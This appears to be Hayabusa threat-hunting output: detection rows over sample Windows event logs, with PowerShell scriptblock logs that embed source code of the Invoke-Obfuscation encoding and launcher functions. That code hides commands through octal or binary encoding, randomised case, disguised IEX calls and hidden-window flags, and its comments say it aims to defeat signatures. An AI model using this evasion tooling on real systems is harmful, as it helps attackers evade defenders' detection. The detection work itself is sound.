[IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. 
# Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. 
$InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. 
$InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. 
# Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, 